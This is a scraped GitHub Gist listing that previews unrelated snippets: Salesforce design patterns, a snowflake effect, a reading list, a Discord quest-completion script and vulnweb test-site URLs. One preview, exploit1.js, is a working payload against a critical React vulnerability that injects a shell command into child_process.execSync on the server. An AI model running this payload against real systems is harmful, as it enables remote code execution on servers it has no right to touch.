Skip to content

Instantly share code, notes, and snippets.

VCell AI Platform

Google Summer of Code Logo NRNB Logo

Summary

The VCell AI Assistant is an AI-powered biomodel analysis platform that integrates conversational AI with structured access to the VCell biological modeling database. It enables researchers to search, analyze, and interact with biomodels, publications, and research papers using natural language queries, AI reasoning, and semantic search. The platform supports both traditional database queries and AI-enhanced analysis, including diagram visualization and knowledge base exploration.

@mfranzil
mfranzil / list_rbac_resources.md
Last active December 17, 2025 05:36
Listing all API resources and subresources in Kubernetes
@sajdoko
sajdoko / snowflakes.html
Created December 1, 2023 13:02
Html snowflakes effect built with Js and Css
<!-- HTML -->
<div class="snowflakes" aria-hidden="true"></div>
<!-- JavaScript -->
<script>
const snowflakesContainer = document.querySelector('.snowflakes');
// Number of snowflakes you want to add
const numberOfSnowflakes = 100;
@pantherschools
pantherschools / AccountTrigger.java
Last active December 17, 2025 05:15
The Singleton Design pattern in Salesforce
/**
* @description :
* @author : Amit Singh
* @group :
* @last modified on : 08-15-2022
* @last modified by : Amit Singh
**/
trigger AccountsTrigger on Account (before insert, before update) {
if(Trigger.isInsert){
Accounts.onBeforeInsert();
@pantherschools
pantherschools / AccountGeoCode.java
Created August 18, 2022 17:02
Strategy (aka policy ) pattern in Salesforce
/**
* @description :
* @author : Amit Singh
* @group :
* @last modified on : 08-18-2022
* @last modified by : Amit Singh
**/
public with sharing class AccountGeoCode {
/*
* @description : Using Google Api to get the Latitude and Longitude of the address
@pantherschools
pantherschools / CreditCardPayment.java
Last active December 17, 2025 05:13
The Facade Design Pattern in Salesforce
/**
* @description :
* @author : Amit Singh
* @group :
* @last modified on : 08-20-2022
* @last modified by : Amit Singh
**/
public with sharing class CreditCardPayment implements IPaymentSystem {
public void processPayment(){
@debasishg
debasishg / dod.md
Last active December 17, 2025 05:40
Data oriented design, hardware awareness, cache awareness in data structures & algorithms

Performance Engineering, Hardware and cache awareness with algorithm and data structures

  1. Parallel Computing Course - Stanford CS149, Fall 2023
  2. Performance-Aware Programming Series by Casey Muratori
  3. Algorithms for Modern Hardware
  4. Computer Systems: A Programmer's Perspective, 3/E - by Randal E. Bryant and David R. O'Hallaron, Carnegie Mellon University
  5. Performance Engineering Of Software Systems - am MITOCW course
  6. Parallel Programming 2020 by NHR@FAU
  7. Cpu Caches and Why You Care - by Scott Meyers
  8. [Optimizing a ring buffer for throughput](https://rig
@akshaymarch7
akshaymarch7 / exploit1.js
Created December 16, 2025 05:01
React Critical Vulnerability (CVSS 10.0) - exploit1 code
(async () => {
// === CONFIGURATION ===
const cmd = "touch iWasHere"; // The command you want to run
const targetUrl = "/namaste"; // The endpoint to hit (relative to current domain)
console.log(`[*] Attempting to run command: ${cmd}`);
// 1. Construct the malicious payload
// This injects the command into a child_process.execSync call and throws the result in an error digest
const payloadJson = `{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('${cmd}').toString('base64');throw Object.assign(new Error('x'),{digest: res});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}`;
@aamiaa
aamiaa / CompleteDiscordQuest.md
Last active December 17, 2025 05:19
Complete Recent Discord Quest

Complete Recent Discord Quest

Note

This does not works in browser for quests which require you to play a game! Use the desktop app to complete those.

How to use this script:

  1. Accept a quest under Discover -> Quests
  2. Press Ctrl+Shift+I to open DevTools
  3. Go to the Console tab
  4. Paste the following code and hit enter:
http://vulnweb.com/
http://testhtml5.vulnweb.com - nginx, Python, Flask, CouchDB
http://testphp.vulnweb.com - Apache, PHP, MySQL
http://testasp.vulnweb.com - IIS, ASP, Microsoft SQL Server
http://testaspnet.vulnweb.com - IIS, ASP.NET, Microsoft SQL Server